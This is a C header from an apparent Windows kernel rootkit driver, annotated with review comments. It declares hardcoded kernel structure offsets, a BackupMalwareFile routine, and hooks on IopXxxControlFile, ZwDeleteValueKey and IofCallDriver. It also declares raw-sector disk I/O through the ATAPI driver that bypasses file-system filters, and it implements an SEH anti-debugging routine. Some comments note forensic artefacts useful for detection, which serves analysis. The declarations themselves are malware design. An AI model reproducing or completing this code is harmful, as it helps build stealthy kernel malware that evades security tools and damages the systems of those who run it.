0x124, // OFFSET_EPROCESS_ParentPID
0x14C, // OFFSET_EPROCESS_ImageFileName
0x188, // OFFSET_EPROCESS_PEB
0x228, // OFFSET_EPROCESS_ProcessExiting
0x004, // OFFSET_EPROCESS_ProcExitMask
0x008, // OFFSET_EPROCESS_ProcDelMask
0x168, // OFFSET_EPROCESS_ThreadListHead
0x20C, // OFFSET_ETHREAD_Cid
0x1F8, // OFFSET_ETHREAD_StartAddress
0x240, // OFFSET_ETHREAD_W32StartAddress
0x144, // OFFSET_ETHREAD_ThreadProcess
0x248, // OFFSET_ETHREAD_ThreadListEntry
0x010, // OFFSET_PEB_ProcParam
0x070, // OFFSET_KTHREAD_WaitListEntry
(ULONG)-1, // OFFSET_EPROCESS_ExitProcessCalled
0x42, // CALLBACK_ID_CLIENTLOADLIBRARY
};
/*
 * Information classes for ZwQuerySystemInformation (declared further down).
 * The ordinal of each name is what the kernel actually dispatches on, so it is
 * written out explicitly here; the values are exactly the sequential 0..49 the
 * implicit numbering produced.
 */
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation                  = 0,
    SystemProcessorInformation              = 1,
    SystemPerformanceInformation            = 2,
    SystemTimeOfDayInformation              = 3,
    SystemPathInformation                   = 4,
    SystemProcessInformation                = 5,   /* process/thread list */
    SystemCallCountInformation              = 6,
    SystemDeviceInformation                 = 7,
    SystemProcessorPerformanceInformation   = 8,
    SystemFlagsInformation                  = 9,
    SystemCallTimeInformation               = 10,
    SystemModuleInformation                 = 11,  /* loaded kernel modules (undocumented); the usual way to find ntoskrnl's base */
    SystemLocksInformation                  = 12,
    SystemStackTraceInformation             = 13,
    SystemPagedPoolInformation              = 14,
    SystemNonPagedPoolInformation           = 15,
    SystemHandleInformation                 = 16,
    SystemObjectInformation                 = 17,
    SystemPageFileInformation               = 18,
    SystemVdmInstemulInformation            = 19,
    SystemVdmBopInformation                 = 20,
    SystemFileCacheInformation              = 21,
    SystemPoolTagInformation                = 22,
    SystemInterruptInformation              = 23,
    SystemDpcBehaviorInformation            = 24,
    SystemFullMemoryInformation             = 25,
    SystemLoadGdiDriverInformation          = 26,
    SystemUnloadGdiDriverInformation        = 27,
    SystemTimeAdjustmentInformation         = 28,
    SystemSummaryMemoryInformation          = 29,
    SystemUnused1                           = 30,
    SystemPerformanceTraceInformation       = 31,
    SystemCrashDumpInformation              = 32,
    SystemExceptionInformation              = 33,
    SystemCrashDumpStateInformation         = 34,
    SystemKernelDebuggerInformation         = 35,  /* documented: reports whether a kernel debugger is attached */
    SystemContextSwitchInformation          = 36,
    SystemRegistryQuotaInformation          = 37,
    SystemExtendServiceTableInformation     = 38,
    SystemPrioritySeperation                = 39,
    SystemUnused3                           = 40,
    SystemUnused4                           = 41,
    SystemUnused5                           = 42,
    SystemUnused6                           = 43,
    SystemCurrentTimeZoneInformation        = 44,
    SystemLookasideInformation              = 45,
    SystemTimeSlipNotification              = 46,
    SystemSessionCreate                     = 47,
    SystemSessionDetach                     = 48,
    SystemSessionInformation                = 49
} SYSTEM_INFORMATION_CLASS;
/* Object type of driver objects ("\Driver\..."), exported by ntoskrnl.  Passed
 * as the ObjectType argument of ObReferenceObjectByName (below) to look a
 * driver up by name — presumably how GetAtapiDevice() (declared later) reaches
 * the ATAPI driver; confirm in hookfile.c. */
extern POBJECT_TYPE IoDriverObjectType;
/* Undocumented ntoskrnl export, declared locally because the public headers
 * omit it.  As I understand the routine, it returns the file system's own
 * device object for FileObject rather than the top of the attached stack, so
 * I/O sent to the result is not seen by file-system filter drivers (Filter
 * Manager minifilters attach above it).  That is the property a defender
 * should keep in mind when reading the callers. */
NTKERNELAPI
PDEVICE_OBJECT
IoGetBaseFileSystemDeviceObject(
__in PFILE_OBJECT FileObject
);
/* Undocumented ntoskrnl export: resolves a full object-manager path
 * (ObjectName) to an object of type ObjectType.  On success *Object holds a
 * referenced object that the caller must release with ObDereferenceObject.
 * Attributes takes OBJ_* flags (OBJ_CASE_INSENSITIVE is the usual one);
 * PassedAccessState and ParseContext are normally NULL. */
extern
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE PassedAccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID *Object
);
/* Function-pointer type mirroring ObReferenceObjectByName, for calling the
 * routine through an address resolved at run time (e.g. via
 * MmGetSystemRoutineAddress) instead of a link-time import.  Parameter
 * semantics, including the reference the caller must release, are the same
 * as for the prototype above. */
typedef
NTSTATUS
(*XXXObReferenceObjectByName)(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE PassedAccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID *Object
);
/* Exported by ntoskrnl but not declared by every WDK header set, hence the
 * local prototype.  Fills SystemInformation (SystemInformationLength bytes)
 * for the class in SYSTEM_INFORMATION_CLASS above.  When the buffer is too
 * small it returns STATUS_INFO_LENGTH_MISMATCH and, if ReturnLength is given,
 * the size needed — callers normally loop, reallocating to that size.
 * Presumably used with SystemModuleInformation by GetNtOSKernelBase() /
 * GetModuleBase() below; confirm in hookfile.c. */
extern
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation (
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
/* Kernel build number exported by ntoskrnl.  NOTE(review): as I recall the
 * export is wider than 16 bits, with build-type flags in the high bits;
 * importing it as a WORD keeps only the low half, i.e. the plain build number
 * (e.g. 2600 for XP).  Presumably intentional — confirm against the build
 * environment.  Likely the input GetSystemOffset() uses to pick its offsets. */
__declspec(dllimport) WORD NtBuildNumber;
//__declspec(dllimport) POBJECT_TYPE* PsProcessType;
/* Looks up the EPROCESS for a process id.  On success *pProcess holds a
 * referenced object that the caller must release with ObDereferenceObject.
 * NOTE(review): the WDK prototype takes a HANDLE for the id, not ULONG; the
 * two agree only on 32-bit builds (which is what this header targets). */
NTSYSAPI
NTSTATUS
PsLookupProcessByProcessId(
IN ULONG nPID,
OUT PEPROCESS* pProcess
);
/* NOTE(review): the I/O manager's DRIVER_UNLOAD callback returns VOID.
 * Declaring it NTSTATUS means the return value is never observed by anyone,
 * and storing the address in DriverObject->DriverUnload needs a cast.  Left
 * as declared because the definition in hookfile.c must match. */
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject);
/* DRIVER_DISPATCH-shaped IRP handlers: the generic one and, presumably, the
 * IRP_MJ_DEVICE_CONTROL handler for the driver's own control device. */
NTSTATUS DriverDispatch(IN PDEVICE_OBJECT pDeviceObj, IN PIRP pIrp );
NTSTATUS DriverDeviceControl( PDEVICE_OBJECT pDeviceObj, PIRP pIrp);
/* Creates a directory beneath punistrParentDir; "KRodog" is presumably the
 * directory name — confirm in hookfile.c. */
NTSTATUS MakeKRodogDir( PUNICODE_STRING punistrParentDir);
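/* Pool tag for every allocation this driver makes.  Multi-character constants
 * are stored little-endian, so in pool-tag listings (poolmon, !poolused) the
 * tag reads "SaMo" — that is the string to look for when attributing
 * non-paged pool usage to this driver. */
#define MEMORYTAG 'oMaS'
/* Same value as the user-mode constant; defined here presumably because the
 * kernel-mode headers in use do not provide it. */
#define INVALID_HANDLE_VALUE ((HANDLE)(LONG_PTR)-1)
/* Emulated "new": allocates `size` bytes of non-paged pool and casts to type*.
 * `size` is an arbitrary expression, so it is parenthesised — the original
 * `sizeof(BYTE) * size` turned `new__(T, a + b)` into `sizeof(BYTE)*a + b`.
 * Returns NULL on failure; the caller must check before use. */
#define new__(type, size) \
    ((type*)ExAllocatePoolWithTag(NonPagedPool, sizeof(BYTE) * (size), MEMORYTAG))
/* Emulated "delete": frees p and nulls it.  The NULL guard is required —
 * unlike free(), ExFreePool(NULL) bug-checks.  NOTE(review): ExFreePoolWithTag
 * with MEMORYTAG would let Driver Verifier catch tag mismatches, but this macro
 * may be applied to buffers allocated elsewhere with other tags, so ExFreePool
 * is kept. */
#define delete_(p) \
    do { if (!(p)) break; ExFreePool(p); (p) = NULL; } while (0)
/* Registry location of the machine-wide TEMP environment value — presumably
 * what GetTempPath() (declared below) reads to choose the directory the
 * backup copy is written to; confirm in hookfile.c. */
#define INSTALL_PATH_KEY \
L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment"
#define INSTALL_PATH_VALUE \
L"TEMP"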
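/* Populates g_GlobalOffset for the running kernel build (presumably from
 * NtBuildNumber, selecting one row of the offset table above); FALSE when the
 * build is not recognised, in which case every offset-based access is unsafe.
 * Confirm in hookfile.c.  Prototypes in this block use (void) rather than ()
 * so the compiler checks that no arguments are passed. */
BOOLEAN GetSystemOffset(void);
/* NOTE(review): this is a *definition*, not a declaration.  Every translation
 * unit that includes this header defines the object again (MSVC merges such
 * tentative definitions, but it is not portable C).  Preferred form:
 * `extern OS_OFFSET g_GlobalOffset;` here and one definition in a .c file.
 * Left unchanged because the defining .c file is not visible here. */
OS_OFFSET g_GlobalOffset;
/* TRUE if hFileHandle can be read as a PE image (name only; confirm). */
BOOL CanAccessPeFile( HANDLE hFileHandle);
/* Copies a file to a backup location; the GetTempPath/KernelCopyFile pair
 * below suggests the destination is the TEMP directory named by
 * INSTALL_PATH_*.  A fresh copy under TEMP shortly after the driver loads is
 * therefore the host artefact to look for.  Confirm in hookfile.c. */
NTSTATUS BackupMalwareFile(void);
/* Resolves INSTALL_PATH_KEY / INSTALL_PATH_VALUE into pustrInstallPath
 * (presumably; the caller supplies the UNICODE_STRING buffer). */
NTSTATUS GetTempPath(PUNICODE_STRING pustrInstallPath);
/* Copies pExistFile to pDestFile with kernel file APIs. */
NTSTATUS KernelCopyFile( PUNICODE_STRING pDestFile, PUNICODE_STRING pExistFile);
/* Full object-manager path of Object, probably via ObQueryNameString (below).
 * Ownership of the returned buffer — who frees it, with which tag — is not
 * stated here; confirm before using. */
POBJECT_NAME_INFORMATION GetProcessFullPath( PVOID Object);
/* Install / remove the hook on ntoskrnl's internal IopXxxControlFile
 * (replacement: MyIopXxxControlFile, below). */
BOOL HookIopXxxControlFile(void);
BOOL UnHookIopXxxControlFile(void);
/* Install / remove the hook on ZwDeleteValueKey
 * (replacement: FakeZwDeleteValueKey, below). */
void HookNtDeleteValue(void);
void UnHookNtDeleteValue(void);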
/* Documented export: writes the object-manager name of Object (e.g.
 * "\Device\HarddiskVolume1\...") into ObjectNameInfo, Length bytes, and the
 * size needed into *ReturnLength.  Returns STATUS_INFO_LENGTH_MISMATCH when
 * Length is too small.  Presumably what GetProcessFullPath() builds on. */
NTKERNELAPI
NTSTATUS
ObQueryNameString(
PVOID Object,
POBJECT_NAME_INFORMATION ObjectNameInfo,
ULONG Length,
PULONG ReturnLength
);
/* Documented export: deletes ValueName from the open key KeyHandle.
 * Re-declared here, presumably so FakeZwDeleteValueKey (below) can mirror it
 * exactly.  The Hook/Fake pair around this routine suggests deletions are
 * intercepted — most plausibly to protect the driver's own persistence
 * value; confirm in hookfile.c.  However the hook is installed, a live
 * ZwDeleteValueKey entry that differs from the on-disk ntoskrnl is what
 * integrity checkers would flag. */
NTSYSAPI
NTSTATUS
NTAPI
ZwDeleteValueKey(
HANDLE KeyHandle,
PUNICODE_STRING ValueName
);
/* Documented export: metadata of the open key KeyHandle, selected by
 * KeyInformationClass, into KeyInformation (Length bytes); *ResultLength gets
 * the size needed.  Likely used by the hook to recover the key's name. */
NTSYSAPI
NTSTATUS
ZwQueryKey(
IN HANDLE KeyHandle,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation,
IN ULONG Length,
OUT PULONG ResultLength
);
/* Replacement that takes ZwDeleteValueKey's place once HookNtDeleteValue()
 * has run; same signature so the patched call path is unaffected.  What it
 * blocks and what it forwards is in hookfile.c. */
NTSTATUS FakeZwDeleteValueKey(
HANDLE KeyHandle,
PUNICODE_STRING ValueName
);
/* Pointer type for keeping the original ZwDeleteValueKey, both to forward
 * allowed calls and to restore it in UnHookNtDeleteValue(). */
typedef NTSTATUS (*XXXZwDeleteValueKey)(
HANDLE KeyHandle,
PUNICODE_STRING ValueName
);
/* Shape of ntoskrnl's internal IopXxxControlFile, the unexported worker
 * behind NtDeviceIoControlFile and NtFsControlFile (no public prototype
 * exists, so this typedef is the author's own).  As I understand it, the
 * trailing DeviceIoControl flag is TRUE for the NtDeviceIoControlFile path
 * and FALSE for NtFsControlFile.  A hook at this point sees every user-mode
 * IOCTL/FSCTL before the I/O manager builds the IRP. */
typedef NTSTATUS (*XXXIopXxxControlFile)
(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength,
IN BOOLEAN DeviceIoControl
);
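/* Hook body installed by HookIopXxxControlFile(): same parameter list as
 * XXXIopXxxControlFile above so it can take the original's place.  It sees
 * each user-mode IOCTL/FSCTL (IoControlCode, FileHandle, the buffers) before
 * the I/O manager acts on it; what it filters and what it forwards to the
 * saved original is in hookfile.c.  InputBuffer/OutputBuffer are user-mode
 * pointers at this point and must be probed before use. */
NTSTATUS MyIopXxxControlFile
(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength,
IN BOOLEAN DeviceIoControl
);
/* Records a detection event.  Name only — format and destination are in
 * hookfile.c.  Declared (void) so an accidental argument is rejected. */
NTSTATUS LogThreat(void);
/* IO_COMPLETION_ROUTINE for the IRPs SendCommand() (below) builds:
 * (DeviceObject, Irp, Context).  Returning STATUS_MORE_PROCESSING_REQUIRED
 * keeps the IRP alive for the issuer to inspect and free; any other status
 * lets completion continue up the stack. */
NTSTATUS
SendCommandCompletion(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context
);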
/* Input of FSCTL_GET_RETRIEVAL_POINTERS: the virtual cluster number to start
 * enumerating extents from (0 = beginning of the file).  Same layout as the
 * Windows SDK definition; re-declared locally, presumably because the kernel
 * headers in use lack it. */
typedef struct {
LARGE_INTEGER StartingVcn;
} STARTING_VCN_INPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;
/* Output of FSCTL_GET_RETRIEVAL_POINTERS: ExtentCount runs starting at
 * StartingVcn.  For run i, Extents[i].NextVcn is the first VCN *after* the
 * run and Extents[i].Lcn the logical cluster where it begins on disk; an Lcn
 * of -1 marks a run with no allocation (sparse/compressed).
 * Extents[1] is the Windows-style variable-length trailer, so sizeof this
 * struct does not bound the buffer — size it from ExtentCount, or retry on
 * STATUS_BUFFER_OVERFLOW.  This file-to-cluster map is what SendCommand()
 * (below) needs to address a file's data by raw sector, bypassing the file
 * system; see the note there. */
typedef struct RETRIEVAL_POINTERS_BUFFER {
ULONG ExtentCount;
LARGE_INTEGER StartingVcn;
struct {
LARGE_INTEGER NextVcn;
LARGE_INTEGER Lcn;
} Extents[1];
} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;
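/* Builds and sends one IRP of type MajorFunction (e.g. IRP_MJ_READ /
 * IRP_MJ_WRITE) carrying Buffer to DeviceObject, addressed by sector:
 * SectorOffset is the first sector, SendSectorCount the number of sectors.
 * Sector addressing means the target is a disk port/class device rather than
 * a file, so data moved this way never passes through the file system or its
 * filters; the retrieval-pointer structures above supply the file-to-sector
 * mapping.  Completion is presumably handled by SendCommandCompletion
 * (above) — confirm in hookfile.c.  Whether the IRP is freed by this routine
 * or by the completion routine is not stated here. */
NTSTATUS
SendCommand(
IN PDEVICE_OBJECT DeviceObject,
IN ULONG MajorFunction,
IN PVOID Buffer,
IN ULONG SectorOffset,
IN ULONG SendSectorCount
);
/* Fills Buffer (dwLength bytes, laid out as RETRIEVAL_POINTERS_BUFFER) with
 * a file's cluster runs.  Which file is not a parameter, so it comes from
 * state set elsewhere — confirm.  A too-small buffer is the normal first
 * outcome of this FSCTL; callers should be prepared to retry. */
NTSTATUS FsGetFileRetrievalPointers(PVOID Buffer, DWORD dwLength);
/* Device object of the ATAPI (IDE) port driver, presumably found through
 * ObReferenceObjectByName + IoDriverObjectType (declared above).  Whether the
 * result carries a reference the caller must drop is not stated.
 * Declared (void) so the compiler rejects stray arguments. */
PDEVICE_OBJECT GetAtapiDevice(void);
/* Image base of the loaded kernel module ModuleFileName (presumably by name
 * match over SystemModuleInformation), presumably 0 if absent.  A ULONG base
 * address limits this header to 32-bit kernels — as do the DWORD/LPDWORD
 * address types used below. */
ULONG
GetModuleBase(
PUCHAR ModuleFileName
);
/* As GetModuleBase, also returning the image size through dwSize. */
ULONG GetModuleBaseAndSize( PUCHAR ModuleFileName, OUT PDWORD dwSize);
/* Presumably reads interrupt-descriptor-table entry Index.  An IDT handler
 * address lies inside ntoskrnl, which is one way of locating the kernel image
 * and would connect this to GetNtOSKernelBase() below; confirm in hookfile.c. */
DWORD GetIntEntry( DWORD Index);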
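/*
 * Raises and immediately handles a structured exception.
 *
 * PsGetCurrentProcess() yields a kernel-mode address, and ProbeForRead is
 * expected to raise for any range that is not entirely user-mode (the
 * Alignment argument of 0 is itself outside the documented 1/2/4/8/16 set,
 * so the call raises either way).  The __except block swallows it, so in
 * normal execution the routine has no effect.  An attached kernel debugger
 * sees a first-chance exception here, which is the only observable outcome
 * and presumably the intended one.  The author's note says this must run at
 * PASSIVE_LEVEL; the IRQL test enforces that.
 *
 * Changes from the original: the counter incremented inside the handler was
 * never read, so it is gone, and the IRQL check is a guard clause.
 * `__except(1)` is EXCEPTION_EXECUTE_HANDLER spelled as its numeric value.
 */
__inline VOID AntiDebugBySEH(VOID)
{
    if (KeGetCurrentIrql() != PASSIVE_LEVEL) {
        return;
    }
    __try {
        /* 0x1020 bytes from the EPROCESS: the probe is meant to fail, not to
         * read anything, so any kernel range would serve. */
        ProbeForRead( PsGetCurrentProcess(), 0x1020, FALSE);
    }
    __except (1) {
        /* EXCEPTION_EXECUTE_HANDLER: the exception is deliberately ignored. */
    }
}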
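/* Locates the ntoskrnl image base (presumably via SystemModuleInformation or
 * GetIntEntry above) and stores it somewhere global — the result is not
 * returned, only a success flag.  Declared (void) so stray arguments are
 * rejected. */
BOOL GetNtOSKernelBase(void);
/* Stand-in for IofCallDriver, the FASTCALL routine behind IoCallDriver: same
 * calling convention and parameters so it can replace the original.
 * Presumably the hook body that intercepts IRPs on their way down the device
 * stack — confirm in hookfile.c. */
NTSTATUS
FASTCALL
MyIofCallDriver(
__in PDEVICE_OBJECT DeviceObject,
__inout PIRP Irp
);
/* Local reimplementation or wrapper of IoGetBaseFileSystemDeviceObject
 * (declared near the top of this header); why both exist is not visible here. */
PDEVICE_OBJECT
MyIoGetBaseFileSystemDeviceObject(
IN PFILE_OBJECT FileObject
);
/* Recovers the ATAPI driver's dispatch entry points and returns them through
 * the two out-pointers, which the caller must supply (pInternRoutine is
 * presumably the IRP_MJ_INTERNAL_DEVICE_CONTROL handler).  LPDWORD out-params
 * are 32-bit only.  Reading dispatch addresses "from file" suggests the
 * on-disk image rather than the live driver object, i.e. a way around
 * dispatch-table hooks installed by others — confirm in hookfile.c. */
BOOL GetAtapiDispatchFromFile( LPDWORD pDispatch, LPDWORD pInternRoutine);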
#endif